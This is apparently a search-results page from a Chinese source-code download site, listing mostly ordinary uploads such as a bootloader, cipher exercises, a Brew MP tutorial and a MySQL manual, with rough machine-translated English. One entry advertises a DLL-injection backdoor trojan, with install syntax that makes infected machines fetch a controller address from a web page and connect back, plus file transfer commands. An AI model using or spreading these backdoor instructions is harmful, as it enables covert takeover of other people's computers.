Welcome![Sign In][Sign Up]
Location:
Search - H.26

Search list

[ExploitLOUDONG

Description: 一个用C++编写的五子棋游戏(3) - 藏经阁资源... 一个用C++编写的五子棋游戏(3) 作者:佚名 来源:不详 发布时间:2005-5-12 17:40:46 发布人:admin 减小字体 增大字体 // // Luffar.H by Yuheng Zhao // #ifndef _LUFFAR_H_ #... www.18839.com/Edu/A11/11003/8/20051205770 ... 21K 2005-12-26 - 百度快照 -prepared by the 331 games (3) - a collapse of resources ... C prepared by the 331 games (3) Author : Anonymous Source : unknown released caption-5-12 17:40:46 release : admin reduce font increased font / / / / Luffar.H by Yuheng Zhao / / # # ifndef _LUFFAR_H_ ... www.18839.com/Edu/A1 1/11003/8/20051205770 ... 21K 2005-12-26 - Baidu snapshots
Platform: | Size: 2550 | Author: liwei | Hits:

[Linux-Unixvivi-br-release(20060330).tar

Description: arm9的bootloader,适合通用2410x平台 vivi.pal(20051228)支持tv输出和vga输出,vclk为26.25mhz vivi(20060330)支持vga输出和tv输出,vclk为25mhz 以上两个vivi均编译自vivi-br-release(20051228).tar.gz 在两个不同vivi间切换的方法是在源文件“/include/platform/smdk2410.h”中打开或者取消对PAL640480宏的定义: #define PAL640480 默认该句是注释掉的,编译得到的vivi的vclk为25mhz ch7005手册中要求640x480的pal输出时vclk为26.25mhz,但实践中发现并不需要完全等与这个频率,有时候vivi(20051228)的pal效果更好,具体使用哪个参数用户可以多比较尝试,也可以尝试修改成其他的频率。-arm9 Bootloader, Definitive 2410 x suitable platform vivi.pal (20051228) support tv vga output and losers that vclk to 26.25mhz 14:57 (20060330) support tv vga output and exports, vclk for more than two 25mhz were compiled from 14:57 14:57 - br-release (20 051,228). tar.gz 14:57 in the two different ways of switching between the source document "/ incl. ude/platform/smdk2410.h "open or cancel right PAL64048 0-definition : # define default PAL640480 comment out of the sentence. Compiling the 14:57 of the vclk 25mhz ch7005 manual requirements 640x480 p al output when vclk 26.25mhz for, but the practice is found to be unnecessary, such as the frequency, Sometimes 14:57 (20051228) pal better effect, use specific parameters which users can try to compare, could also try to amend it in
Platform: | Size: 587698 | Author: star | Hits:

[Remote Control050615adminchick-backdoor

Description: 注入进程的 超强DLL后门木马 支持系统 2000以上, 功能: 1.支持密码验证 2.cmd命令 3.上传下载 安装: 要用到的程序. install.exe 和 ServerDll.dll 在CMD下 运行 install -h http://www.donews.net/xxx/archive/2004/09/26/110321.aspx -p 1234567 -h 后面接的是一个网页的地址。网页里面包含自己的IP和端口,肉鸡读到后,会进行反弹连接 -p 后面是认证密码 在静态网页中,必须包含 例如 ###HOST:192.168.0.2:8288@@@ 的特征字符串 其中的###和@@@不可少 HOST:后面接控制端的IP。 :后面是控制端的端口号。可以自己修改。可以使用80 或 8080 上传命令: -put <源文件> <目标文件> 上传到肉鸡的WindowsDirectory下,如2000的WINNT xp的WINDOWS 下载命令: -get <源文件> <目标文件> 建议可以去申请一个免费的Blog,修改起来也很方便。 控制端: MC.exe。主要用于动态肉鸡的管理,例如ADSL拨号用户肉鸡的管理。保证肉鸡不丢失-injection process superpower backdoor Trojan DLL support more than 2,000 systems, functions : 1. Support for password verification 2.cmd three orders. Uploading and downloading Installation : use of the procedure. INSTALL.exe ServerDll.dll the CMD and running install-h http:// www.donews.net/xxx/archive/2004/09/26/110321.aspx-p 1234567-h, followed is a website address. The website which contains its own IP and ports, broiler read, the link will rebound-p password authentication is behind the static pages, for example, must contain # # # HOST : @ @ @ 192.168.0.2:8288 features the String # # # @ @ @ essential HOST : control-followed by the IP. : Back of the control side of the port. Changes can own. 80 can be used to upload or 8080 orders :-put lt; Source gt; Lt; The target file gt; Uploaded
Platform: | Size: 110566 | Author: aaaa | Hits:

[GUI Developbrew window manager

Description:

 

Objective
This topic describes how to create a windowed application that will share the display with other applications.
Brew® MP windowed applications need to be written differently than traditional Brew MP applications. Traditional Brew MP applications, when running in the foreground, occupy full screen space and can modify the display at any time. In the windowing framework, multiple applications share the display at the same time and are not allowed to modify the display arbitrarily. A windowed application also needs to create one or more widgets to be used to create the windows.
A windowed application needs to:
·                  Create and initialize one or more widgets to be passed to IWindowMgr_CreateWindow().
The application can implement its own IWidget, or it can make use of an existing IWidget.
·                  Handle the EVT_APP_START_WINDOW event (and create a window).
·                  Implement handlers for visibility changes, focus changes, and extent changes. The implementation of these handlers is dependent on the details of the application.
·                  Draw in two stages:
·                                  Tell the container that drawing is necessary (ICONTAINER_Invalidate()).
·                                  Draw only when told to draw by the container (IWIDGET_Draw()).
Note: A windowed application should not call any functions that modify IDisplay directly. This includes explicit IDisplay function calls or implicit updates, such as calls to IIMAGE_Draw() or ICONTROL_Redraw(). Drawing should happen only on demand, for example, when IWIDGET_Draw() is called for the widget used to create the window. Existing Widget based applications follow these guidelines and, with minor modifications, can be ported to the windowing framework.
Event handling
A windowed application must respond to these events:
EVT_APP_START_WINDOW and EVT_APP_START
A window-based application receives EVT_APP_START_WINDOW first. If the application returns TRUE for this event, the application does not receive EVT_APP_START. If an application needs to support both the environments (window based and non-window based), it should handle both events.
When the application receives EVT_APP_START_WINDOW, it should create one or more windows.
If creation of IWindowMgr0 fails while handling EVT_APP_START_WINDOW, the application should assume that the platform does not support window-based applications. In this case, the application should return FALSE and continue the application logic in the code for EVT_APP_START.
EVT_APP_SUSPEND and EVT_APP_RESUME
After an application returns TRUE for EVT_APP_START_WINDOW, it will not receive EVT_APP_SUSPEND and EVT_APP_RESUME as non-windowed Brew MP applications do. Instead, the application must check for window status events that are sent to the widget through EVT_WDG_SETPROPERTY events. For EVT_WDG_SETPROPERTY events, wParam indicates which property was set, and dwParam specifies the value of the property. When the AEEWindowMgrExt_PROPEX_STATE property has a value of AEEWindowMgrExt_STATE_VISIBLE, the window is visible.
EVT_WDG_WINDOWSTATUS
The EVT_WDG_WINDOWSTATUS event is sent to a widget to notify it about various window related status messages. AEEWindowStatus.h contains information on the meaning of various status messages.
Sample code location

ZIP filename
Location
Run app
hellowindowapp
Brew MP Library
·                       Download and extract the ZIP file.
·                       Compile the app.
·                       Run it on the Brew MP Simulator.

Example of a windowed application
In the hellowindowapp sample, HelloWindowApp_HandleEvent handles the EVT_APP_START_WINDOW event and creates soft key and pop-up windows:
   case EVT_APP_START_WINDOW:   
      DBGPRINTF("EVT_APP_START_WINDOW");
 
      // Create the softkey and popup windows
      HelloWindowApp_CreateSoftkey(pMe);
      HelloWindowApp_CreateOrActivatePopup(pMe);
 
      // Handling this event tells Brew that we are a windowing
      // application.
      return TRUE;  
HelloWindowApp_CreateSoftkey() creates the soft key widget, sets the color text of the widget, then calls HelloWindowApp_CreateWindow() to create the window.
   WidgetWindow *pWindow = &pMe->softkeyWindow;
  
   if (pWindow->piWindowWidget != NULL) return;
   pWindow->pszDbgName = "Softkey";
   pWindow->pMe = pMe;
  
   (void) ISHELL_CreateInstance(pMe->applet.m_pIShell, AEECLSID_SoftkeyWidget,
            (void **) &pWindow->piWindowWidget);
   if (pWindow->piWindowWidget == NULL) return;
 
   {
      WidgetExtent extent = {0, HWA_SOFTKEY_HEIGHT};
      IWidget_SetExtent(pWindow->piWindowWidget, &extent);
   }
  
   (void) IWidget_SetBGColor(pWindow->piWindowWidget, MAKE_RGBA(200,200,200,255));
  
   // Now set the softkeys text
   {
      IWidget *piTextWidget = NULL;
      (void) IWidget_GetSoftkey(pWindow->piWindowWidget, PROP_SOFTKEY1, &piTextWidget);
     
      if (piTextWidget != NULL) {
         (void) IWidget_SetText(piTextWidget, L"Hover", TRUE);
      }
      RELEASEIF(piTextWidget);
 
      (void) IWidget_GetSoftkey(pWindow->piWindowWidget, PROP_SOFTKEY2, &piTextWidget);
      if (piTextWidget != NULL) {
         (void) IWidget_SetText(piTextWidget, L"Close", TRUE);
      }
      RELEASEIF(piTextWidget);
   }
 
   HelloWindowApp_CreateWindow(pMe, pWindow, AEEWindowMgrExt_CLASS_Softkey);  
HelloWindowApp_CreateWindow() creates the soft key window, as follows:
   int result;
   uint32 winId;
   AEEWindowProp propList[1];
  
   // Set custom window handler
   HANDLERDESC_Init(&pWindow->hdHandler, HelloWindowApp_WindowHandler, pWindow, NULL);
   IWIDGET_SetHandler(pWindow->piWindowWidget, &pWindow->hdHandler);
        
   propList[0].id = AEEWindowMgrExtProp_CLASS;
   propList[0].pbyLen = sizeof(winClass);
   propList[0].pby = (void *) &winClass;
     
   result = IWindowMgr_CreateWindow(pMe->piWindowMgr, (IQI*) (void *) pWindow->piWindowWidget,
      propList, ARR_SIZE(propList), &winId);
 
   if (result != SUCCESS) {
      DBGPRINTF("Window creation failed for %s: %d", pWindow->pszDbgName, result);
      HelloWindowApp_DestroyWindow(pWindow);
   } else {
      DBGPRINTF("Window %s created: id=%d", pWindow->pszDbgName, winId);
   }
HelloWindowApp_CreateOrActivatePopup() creates the widget for the pop-up window, then calls HelloWindowApp_CreateWindow() to create the pop-up window.
   pWindow->piWindowWidget = HelloWindowApp_CreateAndInitImageWidget(
                                pMe,
                                "popups.main" // Image as defined in appinfo.ini
                             );
 
   if (pWindow->piWindowWidget == NULL) return;
 
   {
      WExtent extent = {HWA_POPUP_WIDTH, HWA_POPUP_HEIGHT};
      IWIDGET_SetExtent(pWindow->piWindowWidget, &extent);
   }
 
   HelloWindowApp_CreateWindow(pMe, pWindow, AEEWindowMgrExt_CLASS_Popup);
Related information
·                  See Brew MP Widgets Technology Guide: Creating a Widgets application
·                  See Brew MP API Reference

Base version:
Brew MP 1.0
Tested version:
Brew MP 1.0
Phone tested:
No

 

Platform: | Size: 439828 | Author: bluecrest | Hits:

[Other上海市城域网技术实施方案

Description: 目 录 1. 网络结构设计 1 1.1. 城域骨干网B平面组网结构 1 1.2. 宽带接入网组网方案 2 1.2.1. 市区关键业务子网 3 1.2.2. 郊区关键业务子网 3 2. 路由设计 5 2.1. 总体路由策略 5 2.1.1. 城域网B平面设立私有AS,与CN2及CHINANET不直连(MPLS VPN 可以直接连接CN2 SR) 6 2.2. IGP方案 7 2.3. BGP方案 8 2.4. MPLS VPN的CE-PE路由设计 10 3. L3 MPLS VPN的实施方案 11 3.1. B平面MPLS VPN网络逻辑关系图 11 3.2. MPLS VPN网络号码资源分配规则表 12 3.3. MPLS VPN业务的接入方式 13 3.3.1. 三层MPLS VPN部署设计 13 4. VPLS 部署设计 15 4.1. B平面H-VPLS设计与部署 15 4.2. A-B平面跨域的VPLS设计与部署 17 4.3. VPLS 2层接入L3 MPLS VPN网的设计与部署 18 5. 业务保护部署方案 19 5.1. 业务保护概述 19 5.2. 业务保护部署方案 19 5.2.1. MPLS TE FRR 实施设计 20 5.2.2. BFD设计 23 6. 关键业务(NGN)组网方案 26 6.1. 概述 26 6.2. 关键业务子网连接图 26 6.2.1. 市区部分 26 6.2.2. 郊县部分 27 6.3. 关键业务收敛时间说明 28 6.3.1. 市区部分 28 6.3.2. 郊县部分 29 6.4. 软交换接入方式 29 6.4.1. 市区AG接入 29 6.4.1.1. 市区RIPv2方案 29 6.4.1.2. 市区静态路由方案 33 6.4.1.3. 市区OSPF方案 37 6.4.1.4. 市区方案建议 38 6.4.2. 郊县AG接入 38 6.4.2.1. 松江中兴方案建议 38 6.4.2.2. 松江Alcatel方案建议 39 6.4.2.3. 其他郊县中兴方案建议 40 6.4.2.4. 其他郊县Alcatel方案建议 41 6.5. 郊县环网概述 42 6.5.1. 松江方案 42 6.5.2. 其他郊县方案 43 7. 大客户接入组网方案 45 7.1. 大客户上网接入方案 45 7.2. 大客户VPN组网接入方案 45 7.2.1. 大客户L3 MPLS VPN接入组网方案 45 7.2.2. 大客户VPLS组网接入方案 46 8. 网络设备命名和IP地址需求 47 8.1. 设备和端口命名规则 47 8.1.1. 关键业务子网局点分布表与设备命名 49 8.2. 设备端口命名 49 8.3. 端口描述 50 8.4. IP地址分配 51 9. QOS方案 53 9.1. 综述 53 9.2. 分类标记 53 9.3. 城域网QOS实现方式 54 9.4. B平面QOS 55 9.5. A平面QOS 56 9.6. 宽带接入网QOS 56 10. 网络安全 57 10.1. 路由器安全性 57 10.1.1. 路由器接入安全性 58 10.1.2. 与路由器通信 58 10.1.3. 集中鉴权 59 10.1.4. 路由协议安全性 59 10.1.5. 带内流量过滤到路由引擎 60 10.1.6. 安全审计 64 10.1.7. 网络时间协议(NTP) 65 10.1.8. 路由器安全措施总结 65 10.2. 病毒和DOS 攻击预警和减灾系统 65 10.2.1. DOS 攻击的趋势分析和对核心网的影响 66 10.2.2. 核心网路由器的保护 67 10.2.3. 攻击预警和减灾配合 68 10.2.4. 自动化网络攻击和病毒扫描的抑制 69
Platform: | Size: 3515472 | Author: lm197801 | Hits:

[DocumentsWebBrowser的8个方法和13个属性

Description: WebBrowser的8个方法和13个属性,以及它们的功能: 方法 说明  GoBack 相当于IE的“后退”按钮,使你在当前历史列表中后退一项  GoForward 相当于IE的“前进”按钮,使你在当前历史列表中前进一项  GoHome 相当于IE的“主页”按钮,连接用户默认的主页  GoSearch 相当于IE的“搜索”按钮,连接用户默认的搜索页面  Navigate 连接到指定的URL  Refresh 刷新当前页面  Refresh2 同上,只是可以指定刷新级别,所指定的刷新级别的值来自RefreshConstants枚举表, 该表定义在ExDisp.h中,可以指定的不同值如下: REFRESH_NORMAL 执行简单的刷新,不将HTTP pragma: no-cache头发送给服务器 REFRESH_IFEXPIRED 只有在网页过期后才进行简单的刷新 REFRESH_CONTINUE 仅作内部使用。在MSDN里写着DO NOT USE! 请勿使用 REFRESH_COMPLETELY 将包含pragma: no-cache头的请求发送到服务器  Stop 相当于IE的“停止”按钮,停止当前页面及其内容的载入 属性 说明  Application 如果该对象有效,则返回掌管WebBrowser控件的应用程序实现的自动化对象(IDispatch)。如果在宿主对象中自动化对象无效,这个程序将返回WebBrowser 控件的自动化对象  Parent 返回WebBrowser控件的父自动化对象,通常是一个容器,例如是宿主或IE窗口  Container 返回WebBrowser控件容器的自动化对象。通常该值与Parent属性返回的值相同  Document 为活动的文档返回自动化对象。如果HTML当前正被显示在WebBrowser中,则 Document属性提供对DHTML Object Model的访问途径  TopLevelContainer 返回一个Boolean值,表明IE是否是WebBrowser控件顶层容器,是就返回true  Type 返回已被WebBrowser控件加载的对象的类型。例如:如果加载.doc文件,就会返 回Microsoft Word Document  Left 返回或设置WebBrowser控件窗口的内部左边与容器窗口左边的距离  Top 返回或设置WebBrowser控件窗口的内部左边与容器窗口顶边的距离  Width 返回或设置WebBrowser窗口的宽度,以像素为单位  Height 返回或设置WebBrowser窗口的高度,以像素为单位  LocationName 返回一个字符串,该字符串包含着WebBrowser当前显示的资源的名称,如果资源 是网页就是网页的标题;如果是文件或文件夹,就是文件或文件夹的名称  LocationURL 返回WebBrowser当前正在显示的资源的URL  Busy 返回一个Boolean值,说明WebBrowser当前是否正在加载URL,如果返回true 就可以使用stop方法来撤销正在执行的访问操作 如何利用 WebBrowser 控件,显示 .GIF 动画? 要有一定的网页知识(HTML、JavaScript、CSS) 注意细节: 没有"滚动条"和"鼠标右键弹出的 IE 上下文菜单",".HTM 源文件" ... 我写了一个,效果还真不错! ''Objects: Form1、Command1、CommonDialog1、WebBrowser1 Option Explicit Private Sub Command1_Click() CommonDialog1.ShowOpen If VBA.Len(VBA.Trim(CommonDialog1.FileN欢迎光临学网,点击这里查看更多文章教程 [1] [2] [3] [4] [5] [6] [7] [8] ame)) > 0 Then Dim p As stdole.StdPicture Dim sPath As String sPath = VBA.Trim(VBA.Trim(CommonDialog1.FileName)) Set p = VB.LoadPicture(sPath) WebBrowser1.Width = p.Width * 16 / 26 WebBrowser1.Height = p.Height * 16 / 26 '' WebBrowser1.Navigate "about:blank" WebBrowser1.Document.open WebBrowser1.Document.writeln "" WebBrowser1.Document.writeln "" WebBrowser1.Document.writeln "" WebBrowser1.Document.writeln "" WebBrowser1.Document.writeln "WebBrowser1.Document.writeln " WebBrowser1.Document.writeln "WebBrowser1.Document.writeln " " WebBrowser1.Document.writeln "" WebBrowser1.Document.writeln "" End If End Sub Private Sub Form_Load() Command1.Caption = "&Open" WebBrowser1.Navigate "about:blank" WebBrowser1.Document.open WebBrowser1.Document.writeln "" WebBrowser1.Document.writeln "" WebBrowser1.Document.writeln "" WebBrowser1.Document.writeln "" WebBrowser1.Document.writeln "WebBrowser1.Document.writeln "" WebBrowser1.Document.writeln "" WebBrowser1.Document.Close End Sub
Platform: | Size: 3992 | Author: weidonglingsir@163.com | Hits:

[SourceCodespm

Description: #include"c8051f020.h" #define Tcount 13333 sbit SPWM_OUT1=P0^4; sbit SPWM_OUT2=P0^5; //调制度为0.8// unsigned int code sin_H[25]={26,78,129,178,224,267,305,338,367,389,405,415,418,415,405,389,367,338,305,267,224,178,129,78,26}; unsigned int code sin_L[25]={497,445,394,345,299,256,218,185,156,134,118,108,105,108,118,134,156,185,218,256,299,345,394,445,497}; unsigned max=24; unsigned char i_SPWM1,i_SPWM2; unsigned int temp0,temp1; void SysclkInit(void) { OSCICN=0x87; //设置SYSCLK为16MHz内部振荡器 } void PortInit(void) { XBR0=0x1d; //使CEX0和CEX1输出到P0.0、P0.1 XBR1=0x14; //外部中断0端脚来测频率,外部中断1端脚来测相位差 XBR2=0x40; //允许交叉开关和弱上拉 P0MDOUT=0xff; //端口引脚输出方式为推挽 } void PCA0Init(void) { PCA0MD=0x00; //设置空闲等待方式,PCA时基=SYSCLK/12 //禁止CF中断 PCA0CPM0=0x4d; //PCA输出方式选择,8位pwm PCA0CPM1=0x4d; }
Platform: | Size: 33792 | Author: daiweiran@yahoo.cn | Hits:

[File OperateData4final

Description: 移位密码、代换密码的加密及解密 实现移位密码:k表示26个字母向前循环位移的字符个数 加密: 输入:k,以及小写表示的明文字母,输出:大写字母表示的密文 解密:输入: k,以及大写字母表示的密文,输出:小写字母表示的明文 例如,当k=11时 明文:wewillmeetatmidnight 密文:HPHTWWXPPELEXTOYTRSE 实现代换密码 例如输入密匙guangzhouuniversity,则建立字母对应关系: a b c d e f g h i j K l m G U A N Z H O I V E R S T n o p q r s t u v w X y z Y B C D F J K L M P Q W X 字母对应关系的说明:把密匙按照a-z的顺序对应,去掉重复字母,如guangzhouuniversity中的g第二次出现时被滤掉, 在n对应Y之后,把在密匙中没出现过的其他字母按顺序排列:BCDFJ…… -translocation password substitution password encryption and decryption of achieving shift Password : k said 26 letters forward displacement cycle of the number of characters encryption : Admission : k, and explicitly expressed in lowercase letters, output : capital letters said the ciphertext declassified : Admission : k, and the uppercase letters dense text output : lowercase letters explicitly said for example, when k = 11:00 explicit : wewillmeetatmidnight dense text : HPHTWWXPPELEXTOYTRSE achieve import substitution such as password key guangzho uuniversity, the establishment of correspondence between letters : a b c d e f g h i j k l m G U A N Z H O R E V I S T n o p q r s t u v w x y z Y B C D F J K L M P Q W X correspondence between letters Note : In accordance with a key put-z corr
Platform: | Size: 8192 | Author: | Hits:

[ExploitLOUDONG

Description: 一个用C++编写的五子棋游戏(3) - 藏经阁资源... 一个用C++编写的五子棋游戏(3) 作者:佚名 来源:不详 发布时间:2005-5-12 17:40:46 发布人:admin 减小字体 增大字体 // // Luffar.H by Yuheng Zhao // #ifndef _LUFFAR_H_ #... www.18839.com/Edu/A11/11003/8/20051205770 ... 21K 2005-12-26 - 百度快照 -prepared by the 331 games (3)- a collapse of resources ... C prepared by the 331 games (3) Author : Anonymous Source : unknown released caption-5-12 17:40:46 release : admin reduce font increased font//// Luffar.H by Yuheng Zhao//## ifndef _LUFFAR_H_ ... www.18839.com/Edu/A1 1/11003/8/20051205770 ... 21K 2005-12-26- Baidu snapshots
Platform: | Size: 2048 | Author: liwei | Hits:

[Linux-Unixvivi-br-release(20060330).tar

Description: arm9的bootloader,适合通用2410x平台 vivi.pal(20051228)支持tv输出和vga输出,vclk为26.25mhz vivi(20060330)支持vga输出和tv输出,vclk为25mhz 以上两个vivi均编译自vivi-br-release(20051228).tar.gz 在两个不同vivi间切换的方法是在源文件“/include/platform/smdk2410.h”中打开或者取消对PAL640480宏的定义: #define PAL640480 默认该句是注释掉的,编译得到的vivi的vclk为25mhz ch7005手册中要求640x480的pal输出时vclk为26.25mhz,但实践中发现并不需要完全等与这个频率,有时候vivi(20051228)的pal效果更好,具体使用哪个参数用户可以多比较尝试,也可以尝试修改成其他的频率。-arm9 Bootloader, Definitive 2410 x suitable platform vivi.pal (20051228) support tv vga output and losers that vclk to 26.25mhz 14:57 (20060330) support tv vga output and exports, vclk for more than two 25mhz were compiled from 14:57 14:57- br-release (20 051,228). tar.gz 14:57 in the two different ways of switching between the source document "/ incl. ude/platform/smdk2410.h "open or cancel right PAL64048 0-definition :# define default PAL640480 comment out of the sentence. Compiling the 14:57 of the vclk 25mhz ch7005 manual requirements 640x480 p al output when vclk 26.25mhz for, but the practice is found to be unnecessary, such as the frequency, Sometimes 14:57 (20051228) pal better effect, use specific parameters which users can try to compare, could also try to amend it in
Platform: | Size: 587776 | Author: star | Hits:

[Linux-UnixfirstGTK

Description: 一个基于GTK+的单词数值计算器,1、 按照规则计算单词的值,如果 A B C D E F G H I J K L M N O P Q R S T U V W X Y Z 26个字母(全部用大写)的值分别为 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26,如: WINJACK这个单词的值就为:W+I+N+J+A+C+K=23+9+14+1+3+11=71% HARDWORK=H+A+R+D+W+O+R+D=8+1+18+4+23+15+18+11=98% LOVE=L+O+V+E=12+15+22+5=54% LUCK=L+U+C+K=12+21+3+11=47% ATTITUDE= A+T+T+I+T+U+D+E=1+20+20+9+20+24+4+5=100% 2、对程序的界面布局参考如下图所示,在第一个单行文本框输入一个单词,点击“计算”按钮,按照以上算法计算出该单词的值。 3、如果在最下面的单行文本框输入一个文件路径,此文件每行记录一个单词,那么经过程序计算出各个单词的值,并把结果输出到当前目录下result.txt文件中。如果文件不存在,应该提示错误。 -err
Platform: | Size: 1024 | Author: | Hits:

[Windows DevelopCPPpinyin

Description: C++拼音输入法 a b c d e f g h i j k l m n o p q r s t u v w x y z 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 16--55 区为常见字,区位连续, 56--89为难检字,区位不连续。 index.dat 里前六列为拼音索引,中四列为索引字区位开始与结束位置,后四十列存放重音字和难见字 区位。 将要写入库的词组放入inputcizu.dat里,一次可以放入多个,且各个词组中间不能有分隔符,否则将 识别错误,出现不正确的词组匹配。另外,程序默认识别二字词组,多字词也做相同处理,请朋友们 自觉放入标准词汇,不要使词库失去其意义。 由于字库只收录了16-55区的常见字,但有时可能需要一些复杂字,故提供了字库写入程序,同词库写 入程序相类似,由于偷懒字只能通过源码写入,放入拼音和字,即可将该字加入拼音索引库。 ‘-’或‘=’为翻页键,‘a-z’或‘A-Z’输入拼音,空格和数字键选择所要字。-C++ pingyin
Platform: | Size: 29696 | Author: | Hits:

[File OperateDictionary_Search

Description: 有名的词典查询 自动生成10000个单词然后找他的类似词。。。 -//Dictionary #include <iostream> #include <fstream> #include <string> #include <time.h> #define maxsize 10000000 #define exp_n 10000 using namespace std string word[maxsize] //words of dictionary int word_n //number of words int fn //number of words found int fl[26] int compare_n void Input_data() { int i word_n=0 ifstream infile("dict.txt") while(!infile.eof()){ infile>>word[word_n] //ucase letter convert to lcase letter for(i=0 i<word[word_n].length() i++) if(char(word[word_n][i]) < a ) word[word_n][i]+= a - A word_n++ } infile.close() } int char_int_converter(char c) { if(c<= z && c>= a ) return c- a if(c<= Z && c>= A ) return c- A cout<<"Error!"<<endl exit(0) } int Inword(string ss,int srt,int nd,int &pos)//confirm the word in dictionary or not { //find area:srt is start position nd is end position int k int startw=srt,endw=nd
Platform: | Size: 1133568 | Author: 秘密 | Hits:

[Data structsDBMM

Description: 单表密码 定义: 1、 明表: A B C D E F G H I J K L M N O P Q R S T U V W X Y Z 0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 2、 明文 they will arrive tomorrow 3、 密钥 K=Monday 4、 密码实现 1) 将明文与密钥转为数字串: K=(12,14,13,3,0,24) M=(19,7,4,24,22,8,11,11,0,17,17,8,21,4,19,14,12,14,17,17,14,22,) 2)将明文数字串依密钥长度分段,并逐一与密钥数字相加(模26),得到密文数字串。 19 7 4 24 22 8… 12 14 13 3 0 24… 5 21 17 1 22 6 C=(5,21,17,1,22,6,23,25,13,20 。。。) 3) 密文数字串转换为字母串 c=(FVRBWG XZNURG HSGRMM DFBZ) 5、 解密:模26减运算 1) C=(5,21,17,1,22,6,23,25,13,20 。。。) 2)模26减运算 5 21 17 1 22 6 — 12 14 13 3 0 24… -7 7 4 -2 22 -18 + 26 26 26 26 26 26 M=(19 7 4 24 22 8…) 3)将M转换为字符串,得到明文。 they will arrive tomorrow-Single table code
Platform: | Size: 4096 | Author: lss | Hits:

[MySQLMySQL-5.1-Manual_zh

Description: MySQL5.1 中文手册 这是MySQL参考手册的翻译版本,关于MySQL参考手册,请访问dev.mysql.com。 原始参考手册为英文版。 -------------------------------------------------------------------------------- MySQL 5.1参考手册 前言 1. 一般信息 2. 安装MySQL 3. 教程 4. MySQL程序概述 5. 数据库管理 6. 中的复制 7. 优化 8. 客户端和实用工具程序 9.语言结构 10. 字符集支持 11. 列类型 12. 函数和操作符 13. SQL语句语法 14. 插件式存储引擎体系结构 15. 存储引擎和表类型 16. 编写自定义存储引擎 17. MySQL簇 18. 分区 19. 中的空间扩展 20. 存储程序和函数 21. 触发程序 22. 视图 23. INFORMATION_SCHEMA信息数据库 24. 精度数学 25. API和库 26. 连接器 27. 扩展MySQL A. 问题和常见错误 B. 错误代码和消息 C. 感谢 D. MySQL变更史 E. 移植到其他系统 F. 环境变量 G. 正则表达式 H. Limits in MySQL I. 特性限制 J. GNU通用公共许可 K. MySQL FLOSS许可例外 索引-This is the translated version of the MySQL Reference Manual MySQL Reference Manual, please visit dev.mysql.com. The original Reference Manual is in English, compared with the English reference manual. -------------------------------------------------------------------------------- MySQL 5.1 Reference Manual Preface and Legal Notice 1 General Information 2 Installing and Upgrading MySQL 3 Tutorial 4 MySQL Programs 5 MySQL Server Administration 6 Security 7 Backup and Recovery 8 Optimization 9 Language Structure 10 Globalization 11 Data Types 12 Functions and Operators 13 SQL Statement Syntax 14 Storage Engines 15 High Availability and Scalability 16 Replication 17 MySQL Cluster NDB 6.1- 7.1 18 Partitioning 19 Stored Programs and Views 20 INFORMATION_SCHEMA Tables 21 Connectors and APIs 22 Extending MySQL 23 MySQL Enterprise Monitor 24 MySQL Enterprise Backup 25 MySQL Workbench A Licenses for Third-Party Components B MySQL 5.1 Frequently Asked Questions
Platform: | Size: 4616192 | Author: 菜死大家 | Hits:

[Linux-Unixstrcopy

Description: cFile Name : 2440lib.h // Function : S3C2440 // Date : February 26, 2002 // Version : 0.0 // History // 0.0 :Feb.20.2002:SOP : Programming start // 0.01:Mar.29.2002:purnnamu: For POWEROFF_wake_up, the START... label is added-cFile Name : 2440lib.h // Function : S3C2440 // Date : February 26, 2002 // Version : 0.0 // History // 0.0 :Feb.20.2002:SOP : Programming start // 0.01:Mar.29.2002:purnnamu: For POWEROFF_wake_up, the START... label is added
Platform: | Size: 211968 | Author: jinm | Hits:

[Data structs100programs-in-Python

Description: 一百个用Python实现的小算法或小程序!绝对实用!如: 【程序56】 题目:画图,学用circle画圆形。    1.程序分析: 2.程序源代码: #include "graphics.h" main() { int driver,mode,i float j=1,k=1 driver=VGA mode=VGAHI initgraph(&driver,&mode,"") setbkcolor(YELLOW) for(i=0 i<=25 i++) { setcolor(8) circle(310,250,k) k=k+j j=j+0.3 } } if __name__ == __main__ : from Tkinter import * canvas = Canvas(width=800, height=600, bg= yellow ) canvas.pack(expand=YES, fill=BOTH) k = 1 j = 1 for i in range(0,26): canvas.create_oval(310 - k,250 - k,310 + k,250 + k, width=1) k += j j += 0.3 mainloop() -One hundred small algorithm implemented in Python or applets! Absolutely practical! Such as: 【程序56】 题目:画图,学用circle画圆形。    1.程序分析: 2.程序源代码: #include "graphics.h" main() { int driver,mode,i float j=1,k=1 driver=VGA mode=VGAHI initgraph(&driver,&mode,"") setbkcolor(YELLOW) for(i=0 i<=25 i++) { setcolor(8) circle(310,250,k) k=k+j j=j+0.3 } } if __name__ == __main__ : from Tkinter import* canvas = Canvas(width=800, height=600, bg= yellow ) canvas.pack(expand=YES, fill=BOTH) k = 1 j = 1 for i in range(0,26): canvas.create_oval(310- k,250- k,310+ k,250+ k, width=1) k+= j j+= 0.3 mainloop()
Platform: | Size: 91136 | Author: race | Hits:

[Windows Developupd_creating_cprop_appl

Description: 属性页源代码 upd_creating_cprop_appl 用于展示调用出属性页,查看调用过程源代码-upd_creating_cprop_appl (1 folders, 10 files, 102.26 KB, 112.26 KB in total.)    FScript.rc 3.71 KB    ico00001.ico 318 bytes    icon1.ico 766 bytes    NewPropertySheet.dsp 3.71 KB    NewPropertySheet.dsw 555 bytes    NewPropertySheet.ncb 41.00 KB    NewPropertySheet.opt 47.50 KB    NewPropertySheet.plg 1.58 KB    resource.h 1.11 KB    TheApp.cpp 2.05 KB   Release (0 folders, 1 files, 10.00 KB, 10.00 KB in total.)      NewPropertySheet.exe 10.00 KB
Platform: | Size: 16384 | Author: lzy | Hits:

[DocumentsHuffman

Description: 根据赫夫曼编码的原理,编写一个程序建立英文字母的赫夫曼编码。下面是英文字母使用频率表( ): A 8.19 B 1.47 C 3.83 D 3.91 E 12.25 F 2.26 G 1.71 H 4.57 I 7.10 J 0.14 K 0.41 L 3.77 M 3.34 N 7.06 O 7.26 P 2.89 Q 0.09 R 6.85 S 6.36 T 9.41 U 2.58 V 1.09 W 1.59 X 0.21 Y 1.58 Z 0.08 -According to Huffman coding theory, write a program to establish the letters of Huffman coding. Here is the English alphabet using frequency table ( )
Platform: | Size: 2048 | Author: lipei | Hits:

